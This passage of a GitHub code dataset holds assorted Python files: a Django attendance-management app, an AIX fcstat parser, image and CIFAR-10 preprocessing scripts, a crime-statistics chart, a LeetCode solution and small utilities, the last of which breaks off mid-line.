for gases in g:\n for i in sensor_list:\n if i.s == sensors and i.g == gases:\n m.append(i.m)\n c.append(i.c)\n r.append(i.r)\n m_f = [float(x) for x in m]\n c_f = [float(z) for z in c]\n r_f = [float(a) for a in r]\n for i, x in zip( m_f, c_f):\n y.append(i * 2 + x)\n for i, z in zip(y,r_f):\n y_max.append(i + z)\n\ndef test_correlation():\n x_array = [56, 56, 65, 65, 50, 25, 87, 44, 45]\n y_array = [87, 91, 85, 91, 75, 28, 122, 66, 58]\n print(np.corrcoef(x_array, y_array)[0, 1])\n\ns = load_report()\nhello = y_value(s)\nread_file()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef high_low(sensor_value):\n high = 0\n low = 1000000000000000\n for i in sensor_value:\n if i > high:\n high = i\n if i < low:\n low = i\n return high,low\n\n\ndef test_h_l(lst):\n highest_value , _ = high_low(lst)\n _, lowest_value = high_low(lst)\n print( \"Max is:\" + str(highest_value), \"Min is:\" + str(lowest_value))\n\n\n\n","repo_name":"thedoctor2016/Project","sub_path":"Analysis.py","file_name":"Analysis.py","file_ext":"py","file_size_in_byte":7107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27173548718","text":"from typing import List\n\nclass Solution:\n visited = []\n def numIslands(self, grid: List[List[str]]) -> int:\n self.visited = []\n h, w = len(grid), len(grid[0])\n for i in range(0, h):\n v = []\n for j in range(0, w):\n v.append(0)\n self.visited.append(v)\n\n answer = 0\n for i in range(0, h):\n for j in range(0, w):\n if grid[i][j] == \"1\" and self.visited[i][j] == 0:\n self.find(j, i, grid, h, w)\n answer += 1\n\n return answer\n\n def find(self, x, y, grid, h, w):\n off = [[0, 1], [1, 0], [0, -1], [-1, 0]]\n if self.visited[y][x] == 0:\n self.visited[y][x] = 1\n for i in range(4):\n dy, dx = y + off[i][0], x + off[i][1]\n if 0 <= dy < h and 0 <= dx < w:\n if self.visited[dy][dx] == 0 and grid[dy][dx] == \"1\":\n self.find(dx, dy, grid, h, w)\n\ns = Solution()\np = s.numIslands([[\"1\",\"1\",\"1\",\"1\",\"0\"],[\"1\",\"1\",\"0\",\"1\",\"0\"],[\"1\",\"1\",\"0\",\"0\",\"0\"],[\"0\",\"0\",\"0\",\"0\",\"0\"]])\nprint(p)","repo_name":"kingjakeu/OneHunnitChallenge","sub_path":"leetcode/medium/Q200_NumberofIslands.py","file_name":"Q200_NumberofIslands.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33763220197","text":"\nimport matplotlib.pyplot as plt \nimport pandas as pd \nfrom top_crime_spots import t_10 \n\ndef display_top_10_crime_spots(t10: pd.Series) -> None:\n\n spots = t10.index.tolist()\n values = t10.values.tolist()\n\n values[:] = values[::-1]\n spots[:] = spots[::-1]\n\n temp_bar_color = '#ffb4b4'\n bg_color = '#292c2c'\n text_color = '#fdf7c3'\n text_color_sub = '#5f4e4e'\n\n fig, ax = plt.subplots()\n plt.barh(spots, values, color=temp_bar_color)\n\n fig.patch.set_facecolor(bg_color)\n ax.set_facecolor(bg_color)\n\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['left'].set_color(text_color_sub)\n ax.spines['bottom'].set_color(text_color_sub)\n\n plt.suptitle(\n 'TOP 10 LOS ANGELES CRIME SPOTS SINCE 2020',\n fontfamily = 'Russo One',\n fontsize = 18,\n color = temp_bar_color\n )\n\n plt.title(\n '*source https://catalog.data.gov/dataset/crime-data-from-2020-to-present',\n fontfamily = 'Russo One',\n color = text_color_sub\n )\n\n plt.xlabel(\n 'TOTAL CRIMES COMMITED',\n fontfamily = 'Russo One',\n fontsize = 12.5,\n color = text_color_sub\n )\n\n for index, value in enumerate(values):\n plt.text(\n value,\n index, \n str(value),\n ha = 'center',\n position = (value-40, index-0.1),\n fontweight = 'bold',\n color = bg_color,\n fontsize = 15\n )\n\n plt.xticks(color=text_color_sub)\n plt.yticks(color=text_color)\n plt.show()\n\ndisplay_top_10_crime_spots(t_10)","repo_name":"sasadjukic/century_city_california_mall_crime","sub_path":"la_metro_area/top_crime_spots_chart.py","file_name":"top_crime_spots_chart.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"71965833604","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.db.models import Min, Max, Sum\nfrom .models import Hod_credential, Course, Semester_wise_course, Course_allot, Semester_wise_electives\nfrom faculty.models import FacultyProfile, attendance\nfrom student.models import StudentProfile\nfrom datetime import date\n\n\ndef index(request):\n if request.method == \"POST\":\n username_entered = request.POST.get('username')\n password_entered = request.POST.get('password')\n if authenticate(username_entered, password_entered):\n hod_login(request)\n return redirect('hod_dashboard')\n else:\n return render(request, 'HOD/hod_index.html',{'invalid_cred':'Invalid credentials!'})\n else:\n if not request.session.get('logged'):\n return render(request, 'HOD/hod_index.html',{})\n user_type = request.session.get('user_type')\n if user_type != 'HOD':\n return redirect('home')\n else:\n return redirect('hod_dashboard')\n\n\ndef dashboard(request):\n if _hod_is_logged(request):\n semesters = _get_semesters(request)\n return render(request,'HOD/hod_home.html',{'sem':semesters})\n else:\n return redirect('home')\n\n\ndef course_settings(request,semester=None):\n if not _hod_is_logged(request):\n return redirect('home')\n \n if request.method == 'GET':\n if semester is None:\n return redirect('hod_dashboard')\n else:\n batch = date.today().year - semester//2\n semesters = _get_semesters(request)\n active_username = request.session.get('username')\n hod_instance = Hod_credential.objects.get(hod_id=active_username)\n department = hod_instance.department\n faculty_group = FacultyProfile.objects.all()\n faculties = []\n courses = []\n try:\n course_codes = Semester_wise_course.objects.get(semester=semester, department=department).courses.split('-')\n if semester > 4:\n try:\n course_codes += Semester_wise_electives.objects.get(department=department, semester=semester, year=date.today().year).elective_courses.split('-')\n except Semester_wise_electives.DoesNotExist:\n pass\n for faculty in faculty_group:\n faculties.append({'id':faculty.faculty_id, 'name':faculty.name})\n for code in course_codes:\n try:\n course = Course.objects.get(course_code=code)\n courses.append({'code': course.course_code, 'title':course.title})\n except Course.DoesNotExist:\n pass\n except Semester_wise_course.DoesNotExist:\n pass\n data = {'courses': courses, 'faculties':faculties,'sem':semesters, 'batch':batch, 'semester':semester}\n return render(request, 'HOD/course_setting.html', data)\n else:\n return redirect('course_settings', semester=semester)\n\n\ndef view_courses(request):\n if not _hod_is_logged(request):\n return redirect('home')\n \n semesters = _get_semesters(request)\n username = request.session.get('username')\n department = Hod_credential.objects.get(hod_id=username).department\n if request.method == 'POST':\n selected_batch = request.POST.get('select_batch')\n batch_filter = _get_batches_filter(selected=selected_batch)\n selected_semester = request.POST.get('select_semester')\n semester_filter = _get_semesters_filter(request, selected=selected_semester)\n course_allotment = Course_allot.objects.filter(year=selected_batch, department=department, semester=int(selected_semester))\n course_mapping = _get_course_map(course_allotment)\n if len(course_mapping) == 0:\n no_course = True\n else:\n no_course = False\n template_data = {'sem': semesters, 'courses':course_mapping, 'batch_filter':batch_filter, 'semester_filter':semester_filter, 'no_course':no_course}\n return render(request, 'HOD/course_view.html', template_data)\n else:\n batch_filter = _get_batches_filter(selected=None)\n semester_filter = _get_semesters_filter(request, selected=None)\n template_data = {'sem': semesters, 'batch_filter':batch_filter, 'semester_filter':semester_filter}\n return render(request, 'HOD/course_view.html', template_data)\n\n\ndef attendance_modifier(request):\n if not _hod_is_logged(request):\n return redirect('home')\n \n semesters = _get_semesters(request)\n if request.method == 'POST':\n if 'att_data_submit_btn' in request.POST:\n reg_no_to_modify = request.POST.get('hod_attend_edit_reg_no')\n start_date_entered = request.POST.get('hod_attend_edit_start_date')\n end_date_entered = request.POST.get('hod_attend_edit_end_date')\n print(reg_no_to_modify, start_date_entered, end_date_entered)\n if _modify_attendance_for_student(reg_no_to_modify, start_date_entered, end_date_entered):\n status = 'Attendance modified successfully'\n else:\n status = 'Failed to modify attendance'\n attendance_data = dict()\n try:\n student = StudentProfile.objects.get(reg_no=reg_no_to_modify)\n attendance_data = _get_attendance_data_for_student(student)\n return render(request, 'HOD/hod_attend_edit.html', {'sem': semesters, 'attendance':attendance_data, 'status':status})\n except StudentProfile.DoesNotExist:\n #messages.error(request, 'Failed to modify attendance')\n return redirect('attendance_modifier')\n\n elif 'att_mod_filter_btn' in request.POST:\n reg_no_entered = request.POST.get('hod_attend_edit_regno')\n attendance_data = dict()\n if len(reg_no_entered) != 10 or (not reg_no_entered.isdigit()):\n return render(request, 'HOD/hod_attend_edit.html', {'sem': semesters, 'invalid_reg':True})\n try:\n student = StudentProfile.objects.get(reg_no=reg_no_entered)\n attendance_data = _get_attendance_data_for_student(student)\n return render(request, 'HOD/hod_attend_edit.html', {'sem': semesters, 'attendance':attendance_data})\n except StudentProfile.DoesNotExist:\n return render(request, 'HOD/hod_attend_edit.html', {'sem': semesters, 'not_found':True})\n else:\n return redirect('attendance_modifier')\n else:\n return render(request, 'HOD/hod_attend_edit.html', {'sem': semesters})\n\n\ndef view_student_attendance_semester_wise(request, sem=None, reg_no=None):\n notLoggedAccessPageContent = \"\"\"\n You must login as HOD to see this page.\n
\n \n \"\"\"\n\n if not _hod_is_logged(request):\n return HttpResponse(notLoggedAccessPageContent)\n\n template_data = dict()\n if sem is None or reg_no is None:\n return redirect('attendance_viewer')\n else:\n try:\n student = StudentProfile.objects.get(reg_no=reg_no)\n except StudentProfile.DoesNotExist:\n template_data['invalid_reg'] = True\n return render(request, 'HOD/hod_attend_view_student.html', template_data)\n\n logged_username = request.session.get('username')\n try:\n hod = Hod_credential.objects.get(hod_id=logged_username)\n if student.department != hod.department:\n template_data['invalid_reg'] = True\n else:\n course_year = str(int(reg_no[:4])+ (sem//2))\n courses = Semester_wise_course.objects.get(department=student.department, semester=sem).courses.split('-')\n if sem > 4:\n try:\n courses += Semester_wise_electives.objects.get(department=student.department, semester=sem, year=course_year).elective_courses.split('-')\n except Semester_wise_electives.DoesNotExist:\n pass\n \n att_data_list = [] # using list of dictionaries to store attendance \n for course_code in courses:\n total = attendance.objects.filter(reg_no=student, course_code=course_code).aggregate(total_classes=Sum('no_of_classes')).get('total_classes')\n total = total if total is not None else 0\n present = attendance.objects.filter(reg_no=student, course_code=course_code, attendance='P').aggregate(classes_present=Sum('no_of_classes')).get('classes_present')\n present = present if present is not None else 0\n\n if total != 0:\n percent_present = (present/total)*100\n else:\n percent_present = 0.0\n less_attendance = False\n if percent_present < 75:\n less_attendance = True\n att_data = {'course_code':course_code, 'total_classes':total, 'attended':present, 'percent':percent_present, 'less_attend':less_attendance}\n att_data_list.append(att_data)\n template_data['user_instance'] = student\n template_data['att_data_list'] = att_data_list\n template_data['stu_sem'] = sem\n return render(request, 'HOD/hod_attend_view_student.html', template_data)\n\n except Hod_credential.DoesNotExist:\n return redirect('attendance_viewer')\n\n\ndef attendance_viewer(request):\n semesters = _get_semesters(request)\n department = Hod_credential.objects.get(hod_id=request.session.get('username')).department\n if request.method == 'POST':\n selected_batch = request.POST.get('select_batch')\n selected_semester = request.POST.get('select_semester')\n if selected_batch == '' or selected_semester == '':\n return redirect('attendance_viewer')\n \n this_semester = (date.today().year - int(selected_batch))*2\n if date.today().month >= 7:\n this_semester += 1\n\n batch_filter = _get_batches_filter(selected=selected_batch)\n semester_filter = _get_semesters_filter(request, selected=selected_semester)\n attendance_data = _get_attendance_data_for_batch(department, batch=selected_batch, semester=selected_semester)\n \n template_data = {'sem': semesters, 'batch_filter':batch_filter, 'semester_filter':semester_filter, 'attendance':attendance_data, 'selected_semester':selected_semester}\n return render(request, 'HOD/hod_attend_view.html', template_data)\n else:\n batch_filter = _get_batches_filter(selected=None)\n semester_filter = _get_semesters_filter(request, selected=None)\n template_data = {'sem': semesters, 'batch_filter':batch_filter, 'semester_filter':semester_filter, 'freshpage':True}\n return render(request, 'HOD/hod_attend_view.html', template_data)\n\n\ndef allot_courses(request):\n if request.method == 'POST':\n print(\"Received allotment\")\n batch = request.POST.get('allotment_batch')\n course_semester = int(request.POST.get('allotment_semester'))\n course_department = Hod_credential.objects.get(hod_id=request.session.get('username')).department\n course_map = _parse_course_mapping(request)\n print(course_map)\n for course_code, faculty_id in course_map.items():\n course_instance = Course.objects.get(course_code=course_code.upper())\n faculty_instance = FacultyProfile.objects.get(faculty_id=faculty_id.upper())\n try:\n allotment_object = Course_allot.objects.get(year=batch, department=course_department, course_code=course_instance,semester=course_semester)\n allotment_object.faculty_id = faculty_instance\n allotment_object.save()\n except Course_allot.DoesNotExist:\n allotment_object = Course_allot.objects.create(year=batch, department=course_department, course_code=course_instance, faculty_id=faculty_instance, semester=course_semester)\n allotment_object.save()\n messages.success(request, \"Course allotment has been saved.\")\n return redirect('course_settings', semester=course_semester)\n else:\n return redirect('hod_dashboard')\n\n\ndef _get_semesters(request):\n current_hod = request.session.get('username')\n department = Hod_credential.objects.get(hod_id=current_hod).department\n if department == 'SH':\n return [1,2]\n else:\n return [3,4,5,6,7,8]\n\n\ndef _get_course_map(allotment_filter):\n course_map_list = list()\n if allotment_filter is None:\n return course_map_list\n else:\n for allotment_obj in allotment_filter:\n course_obj = allotment_obj.course_code\n course_code = course_obj.course_code\n course_title = course_obj.title\n faculty_name = allotment_obj.faculty_id.name\n course_map_list.append({'code':course_code, 'title':course_title, 'faculty':faculty_name})\n return course_map_list\n\n\ndef _get_semesters_filter(request, selected=None):\n current_hod = request.session.get('username')\n department = Hod_credential.objects.get(hod_id=current_hod).department\n semesters = dict()\n if selected is None:\n selected = '_____'\n if department == 'SH':\n for semester in range(1,3):\n if selected == str(semester):\n semesters[semester] = True\n else:\n semesters[semester] = False\n else:\n for semester in range(3,9):\n if selected == str(semester):\n semesters[semester] = True\n else:\n semesters[semester] = False\n return semesters\n\n\ndef _get_batches_filter(selected=None):\n batches_list = list(Course_allot.objects.values_list('year', flat=True).distinct())\n batches = dict()\n for batch in batches_list:\n if selected != batch:\n batches[batch] = False\n else:\n batches[batch] = True\n return batches\n\n# Below function seems to be useless\ndef _get_course_filter(request, selected=None, semester=None):\n current_hod = request.session.get('username')\n department = Hod_credential.objects.get(hod_id=current_hod).department\n if semester is None:\n return []\n try:\n course_codes = str(Semester_wise_course.objects.get(department=department, semester=semester).courses).split('-')\n except Semester_wise_course.DoesNotExist:\n return []\n\n course_filter = []\n for course_code in course_codes:\n course_title = Course.objects.get(course_code=course_code).title\n if course_code != selected:\n course_filter.append({'code':course_code, 'title':course_title, 'checked':False})\n else:\n course_filter.append({'code':course_code, 'title':course_title, 'checked':True})\n \n return course_filter\n \n\ndef _get_attendance_data_for_batch(department, batch=None, semester=None):\n if semester is None or batch is None:\n return dict()\n else:\n semester = int(semester)\n try:\n course_year = str(int(batch) + semester // 2)\n courses = Semester_wise_course.objects.get(department=department, semester=semester).courses.split('-')\n if int(semester) > 4:\n try:\n courses += Semester_wise_electives.objects.get(department=department, semester=semester, year=course_year).elective_courses.split('-')\n except Semester_wise_electives.DoesNotExist:\n pass\n students = list(StudentProfile.objects.filter(reg_no__startswith=batch).values_list('reg_no', flat=True).order_by('reg_no'))\n except Semester_wise_course.DoesNotExist:\n return dict()\n except StudentProfile.DoesNotExist:\n return dict()\n attendance_data = dict()\n student_attendance_list = []\n \n for reg_no in students:\n percent_list = []\n nocourse = True\n for course_code in courses:\n total = attendance.objects.filter(reg_no=reg_no, course_code=course_code).aggregate(total_classes=Sum('no_of_classes')).get('total_classes')\n total = total if total is not None else 0\n present = attendance.objects.filter(reg_no=reg_no, course_code=course_code, attendance='P').aggregate(classes_present=Sum('no_of_classes')).get('classes_present')\n present = present if present is not None else 0\n if total != 0:\n nocourse = False\n percent_present = (present/total)*100\n percent_list.append(percent_present)\n else:\n percent_list.append(0.0)\n if nocourse:\n return dict()\n student_attendance_list.append({'reg_no':reg_no, 'percent':percent_list})\n attendance_data['courses'] = courses\n attendance_data['students'] = student_attendance_list\n\n return attendance_data\n\n\ndef _get_attendance_data_for_student(student_profile):\n data = dict()\n this_semester = (date.today().year - int(student_profile.reg_no[:4]))*2\n if date.today().month >= 7:\n this_semester += 1\n \n data['reg_no'] = student_profile.reg_no\n data['stu_name'] = student_profile.name\n\n if this_semester % 2 == 0:\n data['min_date'] = date(date.today().year, 1, 1).strftime('%Y-%m-%d')\n data['max_date'] = date(date.today().year, 6, 30).strftime('%Y-%m-%d')\n else:\n data['min_date'] = date(date.today().year, 7, 1).strftime('%Y-%m-%d')\n data['max_date'] = date(date.today().year, 12, 31).strftime('%Y-%m-%d')\n \n att_data_list = list()\n course_year = str(date.today().year)\n courses = Semester_wise_course.objects.get(department=student_profile.department, semester=this_semester).courses.split('-')\n if this_semester > 4:\n try:\n courses += Semester_wise_electives.objects.get(department=student_profile.department, semester=this_semester, year=course_year).elective_courses.split('-')\n except Semester_wise_electives.DoesNotExist:\n pass\n \n for course_code in courses:\n total = attendance.objects.filter(reg_no=student_profile, course_code=course_code).aggregate(total_classes=Sum('no_of_classes')).get('total_classes')\n total = total if total is not None else 0\n present = attendance.objects.filter(reg_no=student_profile, course_code=course_code, attendance='P').aggregate(classes_present=Sum('no_of_classes')).get('classes_present')\n present = present if present is not None else 0\n if total != 0:\n percent_present = (present/total)*100\n else:\n percent_present = 0.0 \n att_data_list.append(percent_present)\n \n data['courses'] = courses\n data['percentages'] = att_data_list\n return data\n\n\ndef _modify_attendance_for_student(reg_no, start_date, end_date):\n attendance_filter = attendance.objects.filter(reg_no=reg_no, date__range=[start_date, end_date])\n if attendance_filter is None:\n return False\n for attendance_ins in attendance_filter:\n attendance_ins.attendance = 'P'\n attendance_ins.if_mod = True\n attendance_ins.save()\n return True\n\n\ndef _parse_course_mapping(request):\n course_map = dict()\n for key, value in request.POST.items():\n if key.startswith('course_'):\n course_map[key[7:]] = value\n return course_map\n\n# AUTHENTICATION FUNCTIONS WRITTEN BELOW\n\ndef hod_login(request):\n request.session['username'] = request.POST.get('username')\n request.session['logged'] = True\n request.session['user_type'] = 'HOD'\n\n\ndef authenticate(username=None, password=None):\n if username is None or password is None:\n return False\n try:\n hod_ins = Hod_credential.objects.get(hod_id=username)\n except Hod_credential.DoesNotExist:\n return False\n if hod_ins is not None:\n if password == hod_ins.password:\n return True\n else:\n return False\n else:\n return False\n\n\ndef _hod_is_logged(request):\n if request.session.get('logged'):\n user_type = request.session.get('user_type')\n if user_type != 'HOD':\n return False\n else:\n return True\n else:\n return False\n\n\ndef hod_logout(request):\n request.session.clear()\n return redirect('hod_index')","repo_name":"anandubey/projectAMS","sub_path":"HOD/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"71183435524","text":"import numpy as np\nimport pickle\nimport random\nimport os\nimport cv2\n\n# this is where you store your datasets for this project\nDataDir = \"G:\\AI\\Dog-or-Cat-Datasets\"\nCategories = [\"Dog\",\"Cat\"]\n\n# read the images with labels as arrays for later\ntraining_data = []\nimage_size = 70\ndef pre_process_Data():\n for Category in Categories:\n # class_name = Categories.index(Category)\n if Category == \"Dog\":\n label = 0\n else:\n label = 1\n path = os.path.join(DataDir,Category)\n for img in os.listdir(path):\n try: \n img_array = cv2.imread(os.path.join(path, img))\n img_array = np.array(img_array)\n img_array = cv2.resize(img_array,(image_size, image_size))\n img_array = img_array/255.0 #normalization\n training_data.append((img_array, label))\n except Exception as e:\n pass\n\nn=pre_process_Data()\n\n# Save the datasets we processed and divide it into two parts(one for training,one for testing)\nrandom.shuffle(training_data)\nx, y = [], []\nfor img,label in training_data:\n x.append(img)\n y.append(label)\nx = np.array(x)\nx_train = x[:20000]\ny_train = y[:20000]\nx_test = x[20000:]\ny_test = y[20000:]\n\n#save data for trainning\npickle_out = open(\"x_train.pickle\",\"wb\")\npickle.dump(x_train, pickle_out)\npickle_out.close()\n\npickle_out = open(\"y_train.pickle\",\"wb\")\npickle.dump(y_train, pickle_out)\npickle_out.close()\n\npickle_out = open(\"x_test.pickle\",\"wb\")\npickle.dump(x_test, pickle_out)\npickle_out.close()\n\npickle_out = open(\"y_test.pickle\",\"wb\")\npickle.dump(y_test, pickle_out)\npickle_out.close()\n\n\n","repo_name":"harlan-zhao/Dog-or-Cat","sub_path":"image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"33564439954","text":"\"\"\"reported table\n\nRevision ID: cbb52787c330\nRevises: c7acbb09501c\nCreate Date: 2019-12-18 19:31:47.352000\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'cbb52787c330'\ndown_revision = 'c7acbb09501c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('reporters',\n sa.Column('reporter_id', sa.Integer(), nullable=True),\n sa.Column('reported_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['reported_id'], ['status.id'], ),\n sa.ForeignKeyConstraint(['reporter_id'], ['user.id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('reporters')\n # ### end Alembic commands ###\n","repo_name":"jeffreycharters/radriders-real","sub_path":"migrations/versions/cbb52787c330_reported_table.py","file_name":"cbb52787c330_reported_table.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"19226592053","text":"import json\n\nfrom analysingstream.processors.message import Message\n\n\nclass MessageSerializer:\n @staticmethod\n def serialize(msg):\n content = {\n \"payload\": msg.payload,\n \"correlationId\": msg.id.__dict__,\n }\n return json.dumps(content).encode()\n\n @staticmethod\n def deserialize(msg):\n msg = json.loads(msg.decode())\n return Message(msg[\"correlationId\"], msg[\"payload\"])\n","repo_name":"lffsantos/analysing_streaming","sub_path":"analysingstream/processors/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70258896645","text":"# Calcula fatorial\n# Escreva uma função que recebe um número n e devolve o valor de n! = 1 ⋅ 2 ⋅ 3 ⋅ ⋯ ⋅n.\n# O nome da sua função deve ser `fatorial`.\n\ndef fatorial (n):\n result = 1\n \n while n > 1:\n result *= n\n n -= 1\n \n return result\n","repo_name":"FelixLuciano/Elements-of-Software-Design","sub_path":"source/36-Calcula_fatorial.py","file_name":"36-Calcula_fatorial.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"10692739235","text":"#!/opt/freeware/bin/python3\n\n# All imports used\nfrom .Stats_Parser import StatsParser\nfrom . import avg_list, debug_post_msg, pq_round_number, line_cleanup, try_conv_complex\nimport datetime\n\nclass parser(StatsParser) :\n def __init__(self, logger = None, samples = 2, interval = 1, cwd = '/tmp', bos_data = None) :\n super().__init__(logger = logger, cwd = cwd, bos_data=bos_data)\n\n self.file_sources = { 'fcstat' : self.parse_fcstat_e_from_dict }\n # Internal list to hold all keys used when parsing stats data\n self.data['stats'] = {}\n\n return(None)\n\n#######################################################################################################################\n def update_commands(self) :\n '''\n Update commands and functions dict\n '''\n try :\n # In case self.commands and self.functions hasn't been populated yet\n if self.bos_data.data['bos']['os'] == \"aix\" :\n for dev in self.bos_data['dev_class']['adapter'] :\n if 'fcs' in dev :\n key = 'stats_%s'%dev\n self.commands['aix'][key] = \"fcstat -e %s\"%dev\n self.functions['aix'][key] = self.parse_fcstat_stats\n except Exception as e :\n debug_post_msg(self.logger,\n 'Error loading device specific commands, possibly bos_data not initialized : %s'%e,\n raise_type=Exception)\n\n\n return(None)\n\n\n#######################################################################################################################\n def get_measurements(self, elements = [ 'stats' ], consolidate_function = avg_list, update_from_system:bool=True) :\n ret = []\n cur_time = datetime.datetime.utcnow().isoformat()\n if update_from_system :\n self.update_from_system(elements = elements)\n\n for adpt,adpt_data in self.data['stats'].items() :\n try :\n tmp_dct = {}\n for i in [ 'transmit_frames', 'receive_frames', 'transmit_words', 'receive_words', 'lip_count', 'nos_count',\n 'error_frames', 'dumped_frames', 'link_failure_count', 'loss_of_sync_count', 'loss_of_signal',\n 'primitive_seq_protocol_error_count', 'invalid_tx_word_count', 'invalid_crc_count' ] :\n tmp_dct[i] = adpt_data[i]\n ret.append({'measurement' : 'fcstat_general',\n 'tags' : { 'host' : self.bos_data['bos']['hostname'], 'adapter' : adpt },\n 'fields' : tmp_dct,\n 'time' : cur_time })\n for i in 'fc_scsi_adapter_driver_information', 'fc_scsi_traffic_statistics' :\n ret.append({'measurement' : 'fcstat_%s'%i,\n 'tags' : { 'host' : self.bos_data['bos']['hostname'], 'adapter' : adpt },\n 'fields' : adpt_data[i],\n 'time' : cur_time })\n except Exception as e :\n debug_post_msg('Error parsing fcstat data: %s'%e)\n return(ret)\n\n\n#######################################################################################################################\n def parse_fcstat_e_from_dict(self, data:dict) :\n for adapter,adapter_data in data.items() :\n self.parse_fcstat_stats(adapter_data.split('\\n'))\n return(None)\n\n\n#######################################################################################################################\n def parse_fcstat_stats(self, data:list) :\n ret = {}\n lns = []\n adapter = ''\n inner_key = ''\n\n def __str_fix__(st:str) :\n '''\n Inner function to handle string cleanup\n '''\n rt = st.lower().strip(' ')\n for i in [ (' ', '_'), ('/', '_'), (',','.'), ('%',''), ('(', '_'), (')', '_') ] :\n rt = rt.replace(i[0],i[1])\n rt.strip('_')\n return(rt)\n\n for dt in data :\n if dt.count('\\n') > 1 :\n lns += dt.split('\\n')\n else :\n lns += [ dt ]\n for dt in line_cleanup(data, split=True, delimiter=':', cleanup=True, remove_endln=True) :\n if len(dt) == 1 :\n if dt[0] in [ 'FC SCSI Adapter Driver Information',\n 'FC SCSI Traffic Statistics' ] :\n inner_key = __str_fix__(dt[0])\n ret[adapter][inner_key] = {}\n if len(dt) == 2 :\n key = __str_fix__(dt[0])\n value = __str_fix__(dt[1])\n\n if len(value) > 0 :\n if 'FIBRE CHANNEL STATISTICS REPORT' in dt[0] :\n adapter = dt[1].strip()\n inner_key = ''\n ret[adapter] = {}\n elif dt[0] in [ 'Frames', 'Words' ] :\n i_dt = dt[1].strip().split(' ')\n k_0 = 'transmit_%s'%(__str_fix__(dt[0]))\n k_1 = 'receive_%s'%(__str_fix__(dt[0]))\n ret[adapter][k_0] = try_conv_complex(i_dt[0])\n ret[adapter][k_1] = try_conv_complex(i_dt[1])\n elif len(inner_key) > 0 :\n ret[adapter][inner_key][key] = try_conv_complex(value)\n else :\n ret[adapter][key] = try_conv_complex(value)\n self.data['stats'].update(ret)\n return(ret)\n\n\n#######################################################################################################################\n","repo_name":"pslq/checklist","sub_path":"pq_checklist/fcstat.py","file_name":"fcstat.py","file_ext":"py","file_size_in_byte":5063,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"7490487844","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2019/12/24 11:50\n# @Author : Leslee\n\"\"\"\ncifar-10数据集最佳实践\n1. 创建文件名列表,直接读取。\n2. 创建文件名队列:用tf.train.string_input_producer\n3. 创建reader和decoder,在decoder把图片reshape成模型输入的shape\n4. 创建样例队列\n\n\"\"\"\nimport tensorflow as tf\n\nLABEL_BYTES = 1\nIMAGE_SIZE = 32\nIMAGE_IMAGE_DEPTH = 3\n\nIMAGE_BYTES = IMAGE_SIZE * IMAGE_SIZE * IMAGE_IMAGE_DEPTH\nNUM_CLASSES = 10\n\ndef read_cifar10(data_file,batch_size):\n \"\"\"\n :param data_file: 数据文件\n :param batch_size:\n :return:\n images:[batch_size,image_size,image_size,3] 图像批数据\n labels:[batch_size,NUM_CLASSES]\n \"\"\"\n # 单挑数据字节数\n record_bytes = LABEL_BYTES + IMAGE_BYTES\n # 创建文件名列表\n data_files = tf.gfile.Glob(data_file)\n # 创建文件名队列\n file_queue = tf.train.string_input_producer(data_files,shuffle=True)\n\n # 创建二进制文件对应的Reader\n reader = tf.FixedLengthRecordReader(record_bytes=record_bytes)\n _,value = reader.read(file_queue)\n # 将样例分拆为列表标签和图片\n record = tf.reshape(tf.decode_raw(value,tf.uint8),[record_bytes])\n label = tf.cast(tf.slice(record,[0],[LABEL_BYTES]),tf.int32)\n # 把[depth*height*width]转为[depth,height,depth]的图片Tensor\n depth_major = tf.reshape(tf.slice(record,[LABEL_BYTES],[IMAGE_BYTES]),\n [IMAGE_IMAGE_DEPTH,IMAGE_SIZE,IMAGE_SIZE])\n # shape\n image = tf.cast(tf.transpose(depth_major,[1,2,0]),tf.float32)\n\n # 创建样例队列,初始化一个随机队列,指定好参数\n example_queue = tf.RandomShuffleQueue(\n capacity=16*batch_size,\n min_after_dequeue=8*batch_size,\n dtypes=[tf.float32,tf.int32],\n shapes=[[IMAGE_SIZE,IMAGE_SIZE,IMAGE_IMAGE_DEPTH],[1]])\n num_threads = 16\n # 创建样例队列的入队操作\n example_enqueue_op = example_queue.enqueue([image,label])\n # 把定义的16个线程全部加入到queue runner\n tf.train.add_queue_runner(tf.train.queue_runner.QueueRunner(\n example_queue,[example_enqueue_op] *num_threads))\n # 按照batch_size大小出队\n images, labels = example_queue.dequeue_many(batch_size)\n labels = tf.reshape(labels,[batch_size,1])\n indices = tf.reshape(tf.range(0,batch_size,1),[batch_size,1])\n labels = 